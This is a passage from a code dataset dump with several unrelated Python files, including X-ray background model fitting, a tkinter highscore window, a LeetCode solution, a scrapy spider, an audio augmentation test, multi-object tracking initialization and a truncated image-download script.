pnbkgexpdec + pnbkgsmedge1 * pnbkgsmedge2 * (pnbkgspline2 * pnbkginspl + pnbkgline1 + pnbkgline2 + pnbkgline3 + pnbkgline4 + pnbkgline5 + pnbkgline6 + pnbkgline7 + pnbkgline8 + pnbkgline9 + pnbkgline10 + pnbkgline11))) + pnbrsp(galabs * (pnbkgpl + pnbkgapec) + pnbkglcapec)\n for l, c in zip(pnlines, pncenters):\n l.LineE = c\n l.LineE.min = c - 0.05\n l.LineE.max = c + 0.05\n\n pnbkgline2.LineE = pnbkgline1.LineE\n pnbkgline8.LineE = pnbkgline7.LineE\n for l, s in zip(pnlines, pnlinewidth):\n l.Sigma = s\n\n for l in pnfree:\n l.Sigma.min = 1e-05\n l.Sigma.max = 0.2\n\n for l in pnfixwid:\n l.Sigma.freeze()\n\n for l, n in zip(pnlines, pnlinenorm):\n l.norm = n\n l.norm.min = 1e-10\n l.norm.max = 10000000000.0\n\n pnbkgcons.factor = 1.0\n pnbkgcons.factor.freeze()\n pnbkgapec.kT = 0.286928\n pnbkgapec.kT.min = 0.008\n pnbkgapec.kT.max = 64\n pnbkgapec.Abundanc = 1.0\n pnbkgapec.Abundanc.freeze()\n pnbkgapec.Redshift = 0.0\n pnbkgapec.Redshift.freeze()\n pnbkgapec.norm = 5.5841e-05\n pnbkgapec.norm.min = 1e-10\n pnbkgapec.norm.max = 10000000000.0\n pnbkglcapec.kT = 0.1\n pnbkglcapec.kT.freeze()\n pnbkglcapec.Abundanc = 1.0\n pnbkglcapec.Abundanc.freeze()\n pnbkglcapec.Redshift = 0.0\n pnbkglcapec.Redshift.freeze()\n pnbkglcapec.norm = 3.89164e-05\n pnbkglcapec.norm.min = 1e-10\n pnbkglcapec.norm.max = 10000000000.0\n pnbkgexpdec.factor = 44.3418\n pnbkgexpdec.factor.min = 0\n pnbkgexpdec.factor.max = 100\n pnbkgexpdec.norm = 6830.89\n pnbkgexpdec.norm.freeze()\n pnbkgsmedge1.edgeE = 0.538408\n pnbkgsmedge1.edgeE.freeze()\n pnbkgsmedge1.MaxTau = 1.40238\n pnbkgsmedge1.MaxTau.min = 0\n pnbkgsmedge1.MaxTau.max = 10\n pnbkgsmedge1.index = -2.67\n pnbkgsmedge1.index.freeze()\n pnbkgsmedge1.width = 0.313365\n pnbkgsmedge1.width.min = 0.01\n pnbkgsmedge1.width.max = 100\n pnbkgsmedge2.edgeE = 1.38826\n pnbkgsmedge2.edgeE.freeze()\n pnbkgsmedge2.MaxTau.min = 0\n pnbkgsmedge2.MaxTau.max = 10\n pnbkgsmedge2.MaxTau = 9.37167\n pnbkgsmedge2.index = -2.67\n pnbkgsmedge2.index.freeze()\n pnbkgsmedge2.width = 5.7642\n pnbkgsmedge2.width.min = 0.01\n pnbkgsmedge2.width.max = 100\n pnbkgspline1.Estart = 0.2\n pnbkgspline1.Estart.freeze()\n 
pnbkgspline1.Ystart = -1.31506\n pnbkgspline1.Ystart.min = -1000000.0\n pnbkgspline1.Ystart.max = 1000000.0\n pnbkgspline1.Yend = 1064.16\n pnbkgspline1.Yend.min = -1000000.0\n pnbkgspline1.Yend.max = 1000000.0\n pnbkgspline1.YPstart = -106.183\n pnbkgspline1.YPstart.min = -1000000.0\n pnbkgspline1.YPstart.max = 1000000.0\n pnbkgspline1.YPend = -366.092\n pnbkgspline1.YPend.min = -1000000.0\n pnbkgspline1.YPend.max = 1000000.0\n pnbkgspline1.Eend = 1.74715\n pnbkgspline1.Eend.min = 0\n pnbkgspline1.Eend.max = 100\n pnbkgspline2.Estart = 3.29056\n pnbkgspline2.Ystart = 1.00643\n pnbkgspline2.Ystart.min = -1000000.0\n pnbkgspline2.Ystart.max = 1000000.0\n pnbkgspline2.Yend = 0.887026\n pnbkgspline2.Yend.min = -1000000.0\n pnbkgspline2.Yend.max = 1000000.0\n pnbkgspline2.YPstart = -0.278401\n pnbkgspline2.YPstart.min = -1000000.0\n pnbkgspline2.YPstart.max = 1000000.0\n pnbkgspline2.YPend = 0.00484809\n pnbkgspline2.YPend.min = -1000000.0\n pnbkgspline2.YPend.max = 1000000.0\n pnbkgspline2.Eend = 7.32701\n pnbkgspline2.Eend.min = 0\n pnbkgspline2.Eend.max = 100\n pnbkginspl.PhoIndex = 0.279\n pnbkginspl.PhoIndex.min = -2\n pnbkginspl.PhoIndex.max = 9\n pnbkginspl.norm = 0.00823614\n pnbkginspl.norm.min = 1e-10\n pnbkginspl.norm.max = 1000000.0\n pnbkgpl.PhoIndex = 1.46\n pnbkgpl.PhoIndex.freeze()\n pnbkgpl.norm = 1.25288e-05\n pnbkgpl.norm.min = 1e-10\n pnbkgpl.norm.max = 1000.0\n if fit:\n set_bkg_full_model(i, pnbunitrsp(pnbkgcons * (pnbkgspline1 * pnbkgexpdec + pnbkgsmedge1 * pnbkgsmedge2 * (pnbkgspline2 * pnbkginspl))))\n print('Fitting (1/8)...')\n fit_bkg(i)\n set_bkg_full_model(i, pnbunitrsp(pnbkgcons * (pnbkgspline1 * pnbkgexpdec + pnbkgsmedge1 * pnbkgsmedge2 * (pnbkgspline2 * pnbkginspl + pnbkgline2))))\n print('Fitting (2/8)...')\n fit_bkg(i)\n set_bkg_full_model(i, pnbunitrsp(pnbkgcons * (pnbkgspline1 * pnbkgexpdec + pnbkgsmedge1 * pnbkgsmedge2 * (pnbkgspline2 * pnbkginspl + pnbkgline1 + pnbkgline2))))\n print('Fitting (3/8)...')\n fit_bkg(i)\n set_bkg_full_model(i, pnbunitrsp(pnbkgcons * (pnbkgspline1 * pnbkgexpdec + pnbkgsmedge1 * pnbkgsmedge2 * (pnbkgspline2 * pnbkginspl + pnbkgline1 + pnbkgline2 + pnbkgline7 + pnbkgline8))))\n print('Fitting (4/8)...')\n fit_bkg(i)\n set_bkg_full_model(i, pnbunitrsp(pnbkgcons * (pnbkgspline1 * pnbkgexpdec + pnbkgsmedge1 * pnbkgsmedge2 * (pnbkgspline2 * pnbkginspl + pnbkgline1 + pnbkgline2 + pnbkgline7 + pnbkgline8 + pnbkgline9 + pnbkgline10))))\n print('Fitting (5/8)...')\n fit_bkg(i)\n set_bkg_full_model(i, pnbunitrsp(pnbkgcons * (pnbkgspline1 * pnbkgexpdec + pnbkgsmedge1 * pnbkgsmedge2 * (pnbkgspline2 * pnbkginspl + pnbkgline1 + pnbkgline2 + pnbkgline3 + pnbkgline4 + pnbkgline5 + pnbkgline6 + pnbkgline7 + pnbkgline8 + pnbkgline9 + pnbkgline10 + pnbkgline11))))\n print('Fitting (6/8)...')\n fit_bkg(i)\n set_bkg_full_model(i, pnbunitrsp(pnbkgcons * (pnbkgspline1 * pnbkgexpdec + pnbkgsmedge1 * pnbkgsmedge2 * (pnbkgspline2 * pnbkginspl + pnbkgline1 + pnbkgline2 + pnbkgline3 + pnbkgline4 + pnbkgline5 + pnbkgline6 + pnbkgline7 + pnbkgline8 + pnbkgline9 + pnbkgline10 + pnbkgline11))) + pnbrsp(galabs * pnbkgapec))\n print('Fitting (7/8)...')\n fit_bkg(i)\n set_bkg_full_model(i, pnbunitrsp(pnbkgcons * (pnbkgspline1 * pnbkgexpdec + pnbkgsmedge1 * pnbkgsmedge2 * (pnbkgspline2 * pnbkginspl + pnbkgline1 + pnbkgline2 + pnbkgline3 + pnbkgline4 + pnbkgline5 + pnbkgline6 + pnbkgline7 + pnbkgline8 + pnbkgline9 + pnbkgline10 + pnbkgline11))) + pnbrsp(galabs * (pnbkgapec + pnbkgpl)))\n print('Fitting (8/8)...')\n fit_bkg(i)\n set_bkg_full_model(i, 
pnbunitrsp(pnbkgcons * (pnbkgspline1 * pnbkgexpdec + pnbkgsmedge1 * pnbkgsmedge2 * (pnbkgspline2 * pnbkginspl + pnbkgline1 + pnbkgline2 + pnbkgline3 + pnbkgline4 + pnbkgline5 + pnbkgline6 + pnbkgline7 + pnbkgline8 + pnbkgline9 + pnbkgline10 + pnbkgline11))) + pnbrsp(galabs * (pnbkgapec + pnbkgpl) + pnbkglcapec))\n fit_bkg(i)\n freeze(pnbkgcons, pnbkgspline1, pnbkgexpdec, pnbkgsmedge1, pnbkgsmedge2, pnbkgspline2, pnbkginspl, pnbkgline1, pnbkgline2, pnbkgline3, pnbkgline4, pnbkgline5, pnbkgline6, pnbkgline7, pnbkgline8, pnbkgline9, pnbkgline10, pnbkgline11, galabs, pnbkgapec, pnbkgpl, pnbkglcapec)\n print(' ')\n print('PN background model set up and fitted')\n print('Please double-check that it is a good fit')\n print(' ')\n else:\n set_bkg_full_model(i, pnbunitrsp(pnbkgcons * (pnbkgspline1 * pnbkgexpdec + pnbkgsmedge1 * pnbkgsmedge2 * (pnbkgspline2 * pnbkginspl + pnbkgline1 + pnbkgline2 + pnbkgline3 + pnbkgline4 + pnbkgline5 + pnbkgline6 + pnbkgline7 + pnbkgline8 + pnbkgline9 + pnbkgline10 + pnbkgline11))) + pnbrsp(galabs * (pnbkgapec + pnbkgpl) + pnbkglcapec))\n print(' ')\n print('PN background model set up')\n print(' ')\n return pnscale * (pnbunitrsp(pncons * (pnspline1 * pnexpdec + pnsmedge1 * pnsmedge2 * (pnspline2 * pnbkpl + pngau1 + pngau2 + pngau3 + pngau4 + pngau5 + pngau6 + pngau7 + pngau8 + pngau9 + pngau10 + pngau11))) + pnbrsp(galabs * (pnapec + pnpnexpl) + pnlcapec))\n\n\ndef get_mos_bkg_model(i, galabs, fit=False):\n if get_rmf(i).energ_lo[0] == 0:\n get_rmf(i).energ_lo[0] = 0.001\n else:\n if get_arf(i).energ_lo[0] == 0:\n get_arf(i).energ_lo[0] = 0.001\n mosbrsp = get_response(i, bkg_id=1)\n mosscale = get_bkg_scale(i)\n dia_mos_rmf = get_embedded_file('mos_dia.rmf')\n dia_mos_arf = get_embedded_file('mos_dia.arf')\n copy_data(i, 1002)\n load_bkg_rmf(1002, dia_mos_rmf)\n load_bkg_arf(1002, dia_mos_arf)\n mosbunitrsp = get_response(1002, bkg_id=1)\n delete_data(1002)\n moscenters = [\n 1.486, 1.487, 1.74, 5.41, 5.895, 6.42, 9.71]\n moslinewidth = [0.0384602, 0.165816, 0.0354985, 0.0977018, 0.0745076, 0.0742365, 0.0904855]\n moslinenorm = [0.00993119, 0.00167028, 0.00175461, 0.000286358, 0.000207525, 0.000307555, 0.000458115]\n mos = 'mos%s' % i\n mosbkgcons, mosbkgsmedge, mosbkgspline, mosbkgbknpl, mosbkgline1, mosbkgline2, mosbkgline3, mosbkgline4, mosbkgline5, mosbkgline6, mosbkgline7, mosbkgpl, mosbkgapec, mosbkglcapec = (\n xsconstant(mos + 'cons'), xssmedge(mos + 'smedge'), xsspline(mos + 'spline'), xsbknpower(mos + 'bknpl'), xsgaussian(mos + 'gau1'), xsgaussian(mos + 'gau2'), xsgaussian(mos + 'gau3'), xsgaussian(mos + 'gau4'), xsgaussian(mos + 'gau5'), xsgaussian(mos + 'gau6'), xsgaussian(mos + 'gau7'), xspowerlaw(mos + 'expl'), xsapec(mos + 'apec'), xsapec(mos + 'lcapec'))\n moslines = [\n mosbkgline1, mosbkgline2, mosbkgline3, mosbkgline4, mosbkgline5, mosbkgline6, mosbkgline7]\n mos_bkg = 'mos_bkg_model'\n mos_bkg = mosbunitrsp(mosbkgcons * mosbkgsmedge * mosbkgspline * mosbkgbknpl + mosbkgline1 + mosbkgline2 + mosbkgline3 + mosbkgline4 + mosbkgline5 + mosbkgline6 + mosbkgline7) + mosbrsp(galabs * (mosbkgpl + mosbkgapec) + mosbkglcapec)\n for l, c in zip(moslines, moscenters):\n l.LineE = c\n l.LineE.min = c - 0.05\n l.LineE.max = c + 0.05\n\n for l, s in zip(moslines, moslinewidth):\n l.Sigma = s\n l.Sigma.min = 0.0001\n l.Sigma.max = 0.2\n\n mosbkgline1.Sigma.min = 0.0001\n mosbkgline1.Sigma.max = 0.1\n for l, n in zip(moslines, moslinenorm):\n l.norm = n\n l.norm.min = 1e-10\n l.norm.max = 10000000000.0\n\n mosbkgcons.factor = 1.0\n mosbkgcons.factor.freeze()\n 
mosbkgsmedge.edgeE = 0.538408\n mosbkgsmedge.edgeE.freeze()\n mosbkgsmedge.MaxTau = 0.246633\n mosbkgsmedge.MaxTau.min = 0.0\n mosbkgsmedge.MaxTau.max = 10.0\n mosbkgsmedge.index = -2.67\n mosbkgsmedge.index.freeze()\n mosbkgsmedge.width = 0.01\n mosbkgsmedge.width.min = 0.01\n mosbkgsmedge.width.max = 100.0\n mosbkgspline.Estart = 3.08175\n mosbkgspline.Ystart = 1.00984\n mosbkgspline.Yend = 1.99144\n mosbkgspline.YPstart = -0.0290195\n mosbkgspline.YPend = 0.0549102\n mosbkgspline.Estart.freeze()\n mosbkgspline.Ystart.freeze()\n mosbkgspline.Yend.freeze()\n mosbkgspline.YPstart.freeze()\n mosbkgspline.YPend.freeze()\n mosbkgspline.Eend = 13.6492\n mosbkgspline.Eend.min = 0\n mosbkgspline.Eend.max = 100\n mosbkgbknpl.PhoIndx1 = 1.48636\n mosbkgbknpl.PhoIndx1.min = -2\n mosbkgbknpl.PhoIndx1.max = 9\n mosbkgbknpl.BreakE = 0.415173\n mosbkgbknpl.PhoIndx2 = 0.315615\n mosbkgbknpl.BreakE.freeze()\n mosbkgbknpl.PhoIndx2.freeze()\n mosbkgbknpl.norm = 0.00290071\n mosbkgbknpl.norm.min = 1e-10\n mosbkgbknpl.norm.max = 10000000000.0\n mosbkgpl.PhoIndex = 1.46\n mosbkgpl.PhoIndex.freeze()\n mosbkgpl.norm = 0.000458115\n mosbkgpl.norm.min = 1e-10\n mosbkgpl.norm.max = 10000000000.0\n mosbkgapec.kT = 0.286928\n mosbkgapec.kT.min = 0.008\n mosbkgapec.kT.max = 64\n mosbkgapec.Abundanc = 1.0\n mosbkgapec.Abundanc.freeze()\n mosbkgapec.Redshift = 0.0\n mosbkgapec.Redshift.freeze()\n mosbkgapec.norm = 5.5841e-05\n mosbkgapec.norm.min = 1e-10\n mosbkgapec.norm.max = 10000000000.0\n mosbkglcapec.kT = 0.1\n mosbkglcapec.kT.freeze()\n mosbkglcapec.Abundanc = 1.0\n mosbkglcapec.Abundanc.freeze()\n mosbkglcapec.Redshift = 0.0\n mosbkglcapec.Redshift.freeze()\n mosbkglcapec.norm = 3.89164e-05\n mosbkglcapec.norm.min = 1e-10\n mosbkglcapec.norm.max = 10000000000.0\n if fit:\n set_bkg_full_model(i, mosbunitrsp(mosbkgcons * mosbkgsmedge * mosbkgspline * mosbkgbknpl))\n print('Fitting (1/8)...')\n fit_bkg(i)\n set_bkg_full_model(i, mosbunitrsp(mosbkgcons * mosbkgsmedge * mosbkgspline * mosbkgbknpl + mosbkgline2))\n print('Fitting (2/8)...')\n fit_bkg(i)\n set_bkg_full_model(i, mosbunitrsp(mosbkgcons * mosbkgsmedge * mosbkgspline * mosbkgbknpl + mosbkgline2 + mosbkgline3))\n print('Fitting (3/8)...')\n fit_bkg(i)\n set_bkg_full_model(i, mosbunitrsp(mosbkgcons * mosbkgsmedge * mosbkgspline * mosbkgbknpl + mosbkgline1 + mosbkgline2 + mosbkgline3))\n print('Fitting (4/8)...')\n fit_bkg(i)\n set_bkg_full_model(i, mosbunitrsp(mosbkgcons * mosbkgsmedge * mosbkgspline * mosbkgbknpl + mosbkgline1 + mosbkgline2 + mosbkgline3 + mosbkgline4 + mosbkgline5 + mosbkgline6 + mosbkgline7))\n print('Fitting (5/8)...')\n fit_bkg(i)\n set_bkg_full_model(i, mosbunitrsp(mosbkgcons * mosbkgsmedge * mosbkgspline * mosbkgbknpl + mosbkgline1 + mosbkgline2 + mosbkgline3 + mosbkgline4 + mosbkgline5 + mosbkgline6 + mosbkgline7) + mosbrsp(galabs * mosbkgapec))\n print('Fitting (6/8)...')\n fit_bkg(i)\n set_bkg_full_model(i, mosbunitrsp(mosbkgcons * mosbkgsmedge * mosbkgspline * mosbkgbknpl + mosbkgline1 + mosbkgline2 + mosbkgline3 + mosbkgline4 + mosbkgline5 + mosbkgline6 + mosbkgline7) + mosbrsp(galabs * (mosbkgapec + mosbkgpl)))\n print('Fitting (7/8)...')\n fit_bkg(i)\n set_bkg_full_model(i, mosbunitrsp(mosbkgcons * mosbkgsmedge * mosbkgspline * mosbkgbknpl + mosbkgline1 + mosbkgline2 + mosbkgline3 + mosbkgline4 + mosbkgline5 + mosbkgline6 + mosbkgline7) + mosbrsp(galabs * (mosbkgapec + mosbkgpl) + mosbkglcapec))\n print('Fitting (8/8)...')\n fit_bkg(i)\n freeze(mosbkgcons, mosbkgsmedge, mosbkgspline, mosbkgbknpl, mosbkgline1, mosbkgline2, 
mosbkgline3, mosbkgline4, mosbkgline5, mosbkgline6, mosbkgline7, mosbkgpl, mosbkgapec, mosbkglcapec)\n print(' ')\n print('MOS background model set up and fitted')\n print('Please double-check that it is a good fit')\n print(' ')\n else:\n set_bkg_full_model(i, mosbunitrsp(mosbkgcons * mosbkgsmedge * mosbkgspline * mosbkgbknpl + mosbkgline1 + mosbkgline2 + mosbkgline3 + mosbkgline4 + mosbkgline5 + mosbkgline6 + mosbkgline7) + mosbrsp(galabs * (mosbkgapec + mosbkgpl) + mosbkglcapec))\n print(' ')\n print('MOS background model set up')\n print(' ')\n return mosscale * (mosbunitrsp(mosbkgcons * mosbkgsmedge * mosbkgspline * mosbkgbknpl + mosbkgline1 + mosbkgline2 + mosbkgline3 + mosbkgline4 + mosbkgline5 + mosbkgline6 + mosbkgline7) + mosbrsp(galabs * (mosbkgapec + mosbkgpl) + mosbkglcapec))\n\n\ndef get_mos_bkg_model_cached(i, galabs):\n filename = get_bkg(i).name + '.bkgpars'\n if os.path.exists(filename):\n bkgmodel = get_mos_bkg_model(i, galabs, fit=False)\n for p, v in zip(bkgmodel.pars, numpy.loadtxt(filename)):\n p.val = v\n\n else:\n bkgmodel = get_mos_bkg_model(i, galabs, fit=True)\n numpy.savetxt(filename, [p.val for p in bkgmodel.pars])\n for p in bkgmodel.pars:\n p.freeze()\n\n return bkgmodel\n\n\ndef get_pn_bkg_model_cached(i, galabs):\n filename = get_bkg(i).name + '.bkgpars'\n if os.path.exists(filename):\n bkgmodel = get_pn_bkg_model(i, galabs, fit=False)\n for p, v in zip(bkgmodel.pars, numpy.loadtxt(filename)):\n p.val = v\n\n else:\n bkgmodel = get_pn_bkg_model(i, galabs, fit=True)\n numpy.savetxt(filename, [p.val for p in bkgmodel.pars])\n for p in bkgmodel.pars:\n p.freeze()\n\n return bkgmodel","sub_path":"pycfiles/bxa-3.3.1-py3.6/xmm.cpython-36.py","file_name":"xmm.cpython-36.py","file_ext":"py","file_size_in_byte":19321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"461642281","text":"import tkinter as tk\nfrom tkinter import messagebox\nimport csv, sys\n\ndef save_highscore(name, score, diff):\n print('SAVING HIGHSCORE')\n f = open('highscores.csv', 'a')\n writer = csv.writer(f, delimiter=',', lineterminator='\\n')\n writer.writerow([name, score, diff])\n f.close()\n\ndef load_csv_data():\n f = open('highscores.csv')\n reader = csv.reader(f)\n tempList = []\n for row in reader:\n tempList.append(row)\n f.close()\n return tempList\n \nclass HighscoreWindow():\n def __init__(self, controlParent):\n self.master = tk.Tk()\n self.master.config(bg = \"white\")\n self.master.title(\"Highscores\")\n self.master.call('wm', 'attributes', '.', '-topmost', '1') #Keep it on top of ERYTING\n self.master.protocol(\"WM_DELETE_WINDOW\", self.destroy)\n self.controlParent = controlParent\n self.highscoreData = load_csv_data()\n self.radioFrame = tk.Frame(self.master)\n self.HighscoreFrame = tk.Frame(self.master)\n self.radioFrame.grid()\n self.HighscoreFrame.grid()\n\n self.diffVar = tk.StringVar()\n self.diffVar.set(\"easy\") # initialize\n\n MODES = [\n (\"Easy\", \"easy\", \"#ADD633\"),\n (\"Medium\", \"medium\", \"#6699FF\"),\n (\"Hard\", \"hard\", \"#B24C32\"),\n (\"Custom\", \"custom\", \"#CC33FF\"),\n ]\n\n self.diffVar = tk.StringVar(self.master)\n self.diffVar.set(\"easy\") # initialize\n\n for text, mode, colour in MODES:\n self.b = tk.Radiobutton(self.radioFrame,\n text = text,\n variable = self.diffVar,\n value = mode,\n indicatoron = 0,\n bg = '#DDDDDD',\n bd = 0,\n width = 11,\n selectcolor = colour,\n relief = tk.SUNKEN,\n command = self.refresh)\n self.b.pack(anchor='w', side = \"left\")\n\n \n self.indexTable = 
tk.Listbox(master = self.HighscoreFrame,\n disabledforeground = \"black\",\n setgrid = 5,\n exportselection = 0,\n bd = 0,\n width = 2,\n font = \"Calibri 14\")\n self.indexTable.grid(row = 0, column = 0)\n\n self.nameTable = tk.Listbox(master = self.HighscoreFrame,\n disabledforeground = \"black\",\n setgrid = 5,\n exportselection = 0,\n bd = 0,\n width = 15,\n font = \"Calibri 14\")\n self.nameTable.grid(row = 0, column = 1)\n\n self.scoreTable = tk.Listbox(master = self.HighscoreFrame,\n disabledforeground = \"black\",\n exportselection = 0,\n bd = 0,\n width = 6,\n font = \"Calibri 14\")\n self.scoreTable.grid(row = 0, column = 2)\n\n self.diffTable = tk.Listbox(master = self.HighscoreFrame,\n disabledforeground = \"black\",\n exportselection = 0,\n bd = 0,\n width = 8,\n font = 'Calibri 14')\n self.diffTable.grid(row = 0, column = 3)\n\n self.tables = [self.indexTable, self.nameTable, self.scoreTable, self.diffTable]\n\n self.load()\n\n def load(self):\n self.highscoreData = load_csv_data()\n data = sorted(self.highscoreData, key = lambda x:x[1], reverse = True)\n data = [x for x in data if x[2] == self.diffVar.get()]\n if len(data) != 0:\n for index in range(10):\n try:\n name, score, diff = data[index]\n self.add_highscore(index+1, name, score, diff)\n except IndexError:\n break\n\n for box in self.tables:\n box.itemconfig(0, bg = \"red\")\n \n for box in self.tables:\n box.config(state = tk.DISABLED)\n\n def clear(self):\n for table in self.tables:\n table.delete(0, tk.END)\n\n def refresh(self):\n for box in self.tables:\n box.config(state = tk.NORMAL)\n self.clear()\n self.load()\n\n def add_highscore(self, index, name, score, diff):\n self.indexTable.insert(tk.END, str(index)+'.')\n self.nameTable.insert(tk.END, name)\n self.scoreTable.insert(tk.END, score)\n self.diffTable.insert(tk.END, diff)\n\n def destroy(self):\n self.controlParent.highscoreWindow = None\n self.master.destroy()\n\nif __name__ == \"__main__\":\n window = HighscoreWindow(None)\n\n","sub_path":"highscoreWidget.py","file_name":"highscoreWidget.py","file_ext":"py","file_size_in_byte":5061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"173198697","text":"#\n# @lc app=leetcode id=414 lang=python3\n#\n# [414] Third Maximum Number\n#\n\n# @lc code=start\nclass Solution:\n from random import randint\n def thirdMax(self, nums: List[int]) -> int:\n nums = list(set(nums))\n if len(nums) < 3:\n return max(nums)\n \n def get_kth_rank(nums, k):\n \"\"\"0-indexed (ranks are from 0 (min) to len(nums) - 1 (max).)\"\"\"\n pivot = nums[randint(0, len(nums) - 1)]\n left, right = [], []\n \n for x in nums:\n if x < pivot:\n left.append(x)\n if x > pivot:\n right.append(x)\n \n if len(left) == k:\n return pivot\n elif len(left) < k:\n return get_kth_rank(right, k - (len(left) + 1))\n else:\n return get_kth_rank(left, k)\n \n return get_kth_rank(nums, len(nums) - 3)\n\n \n# @lc code=end\n\n","sub_path":"code/414.third-maximum-number.py","file_name":"414.third-maximum-number.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"580065317","text":"def by_state(str):\n d = {'AZ': 'Arizona',\n 'CA': 'California',\n 'ID': 'Idaho',\n 'IN': 'Indiana',\n 'MA': 'Massachusetts',\n 'OK': 'Oklahoma',\n 'PA': 'Pennsylvania',\n 'VA': 'Virginia'}\n a = str.split(\"\\n\")\n b = {}\n for x in a:\n v = x[-2:]\n if v not in b:\n b[v] = []\n b[v].append(x[:-3].split(\", \"))\n for k in b:\n 
b[k].sort()\n b[k] = \"\\r\\n\".join([\"..... \" + \" \".join(arr + [d[k]]) for arr in b[k]])\n res = []\n for k in sorted(b.keys()):\n res.append(d[k] + \"\\r\\n\" + b[k])\n return \"\\r\\n \".join(res)\n\n\ns = \"\"\"Burt Lane, 90 Pen Avenue, Westbury AZ\nRichard Stall, 334 Shore Parkway, Mountain View CA\nSim Burton, 10 Abbe Road, Richmond ID\nAma Zon, 5AA Clear Bd, Mountain View CA\nBill Joke, 1C Hilary Main Street, Plymouth MA\nAntony None, 12 Loan Alley, Mountain View CA\nFanny Hem, 8A River Street, Beaver Falls PA\nMac Bud, 11354 East Bridge Road, Mountain View CA\nChris Maker, 420 Land Road, Mountain View CA\"\"\"\nprint(by_state(s))\n","sub_path":"codewar/2022/6/Address_Book_by_State.py","file_name":"Address_Book_by_State.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"222037110","text":"import scrapy\n\nclass GsocSpider(scrapy.Spider):\n name = 'gsoc'\n\n start_urls = [\n 'https://summerofcode.withgoogle.com/archive/2016/organizations/'\n ]\n\n def parse(self,response):\n base_link = \"https://summerofcode.withgoogle.com\"\n for org in response.xpath(\"//li[@class = 'organization-card__container']\"):\n link = org.xpath(\".//a/@href\").extract_first()\n org_link = base_link + link\n org_name = org.xpath(\".//h4/text()\").extract_first()\n org_image = org.xpath(\".//org-logo/@data\").extract_first()\n yield {\n 'link' : org_link,\n 'name' : org_name,\n 'image': org_image\n }","sub_path":"gsoc_organizations/spiders/gsoc.py","file_name":"gsoc.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"201697221","text":"import unittest\n\nimport numpy as np\n\nfrom audiomentations.augmentations.transforms import Trim\nfrom audiomentations.core.composition import Compose\n\n\nclass TestTrim(unittest.TestCase):\n def test_trim(self):\n sample_len = 1024\n samples1 = np.zeros((sample_len,), dtype=np.float32)\n samples2 = np.random.normal(0, 1, size=sample_len).astype(np.float32)\n sample_rate = 16000\n augmenter = Compose([Trim(top_db=20, p=1.0)])\n samples_in = np.hstack((samples1, samples2))\n self.assertEqual(len(samples_in), sample_len * 2)\n samples_out = augmenter(samples=samples_in, sample_rate=sample_rate)\n\n self.assertEqual(samples_out.dtype, np.float32)\n self.assertLess(len(samples_out), sample_len * 2)\n","sub_path":"tests/test_trim.py","file_name":"test_trim.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"532038283","text":"import numpy as np\nimport time\nfrom mot_func.mot_search_association import mot_search_association\nfrom mot_func.mot_return_ass_idx import mot_return_ass_idx\nfrom mot_func.mot_tracklets_components_setup import mot_tracklets_components_setup\ndef MOT_Initialization_Tracklets(rgbimg=None,Trk=None,detections=None,param=None,Y_set=None,fr=None,*args,**kwargs):\n print(\"MOT_Initialization_Tracklets.py start\")\n fr = fr\n new_thr=param.new_thr\n for i in range(0,len(Y_set[fr-1].child)):#backup to init the initial tracklet\n prt_idx=Y_set[fr-1].child[i]\n if len(prt_idx) <=1:\n child_idx=mot_search_association(Y_set,fr-1,prt_idx)#child_idx:the init tracklet\n ass_idx=mot_return_ass_idx(child_idx,prt_idx,i,fr-1)\n else:\n child_idx=[]\n tmp_ass_idx=[]\n ass_ln=[]\n for j in range(0,len(prt_idx)):\n child_idx[j]=mot_search_association(Y_set,fr-1,prt_idx(j))\n 
tmp_ass_idx[j]=mot_return_ass_idx(child_idx[j],prt_idx(j),i,fr-1)\n ass_ln[j]=len(find(tmp_ass_idx[j] != 0))\n __,pid=max(ass_ln)\n ass_idx=tmp_ass_idx[pid]\n if len(np.where(np.array(ass_idx) != -1)[0]) >= new_thr:#if the length of init tracketlet >4 then generate the tracklet\n time1 = time.time()\n Trk,param=mot_tracklets_components_setup(rgbimg,Trk,detections,fr,ass_idx,param,None,True)\n time2 = time.time()\n #print(\"after tracklets generate\",time2-time1)\n for h in range(0,len(np.where(ass_idx != 0))):\n Y_set[fr-1 - h].child[ass_idx[-1 - h][0]]=0\n \n print(\"MOT_Initialization_Tracklets over\")\n return Trk,param,Y_set\n \nif __name__ == '__main__':\n pass\n \n","sub_path":"mot_func/MOT_Initialization_Tracklets.py","file_name":"MOT_Initialization_Tracklets.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"490950648","text":"import base64\nimport functools\nimport getpass\nimport hashlib\nimport json\nimport multiprocessing\nimport pathlib\nimport shutil\n\nimport lz4.frame\nimport requests\nimport tensorflow as tf\nimport tqdm\nfrom PIL import Image\n\nfrom utils.model_logger import logger\n\n\ndef get_session():\n username = input(\"Username:\")\n password = getpass.getpass()\n\n s = requests.Session()\n r = s.get(\"http://13.125.1.208/book/login/?next=/book\")\n s.post(\n \"http://13.125.1.208/book/login/?next=/book\",\n data={\n \"password\": password,\n \"username\": username,\n \"csrfmiddlewaretoken\": r.cookies.get(\"csrftoken\"),\n },\n )\n return s\n\n\ndef save_image(url, directory, filename, file_type):\n directory_path = pathlib.Path(directory)\n file_path = directory_path / filename\n new_label = directory_path.parts[-1]\n\n directory_path.mkdir(exist_ok=True, parents=True)\n\n if file_type:\n if filename in file_type:\n label = file_type[filename][0]\n\n if label != new_label:\n prev_path = directory_path.parents[0] / label / filename\n logger.debug(\"Move from {} to {}\".format(prev_path, file_path))\n try:\n shutil.move(prev_path, file_path)\n except:\n pass\n return\n\n if file_path.exists():\n return\n\n try:\n r = requests.get(url, stream=True)\n except requests.exceptions.ConnectionError:\n print(\"Skipping {}\".format(url))\n return\n\n if r.status_code == 200:\n with open(file_path, \"wb\") as f:\n 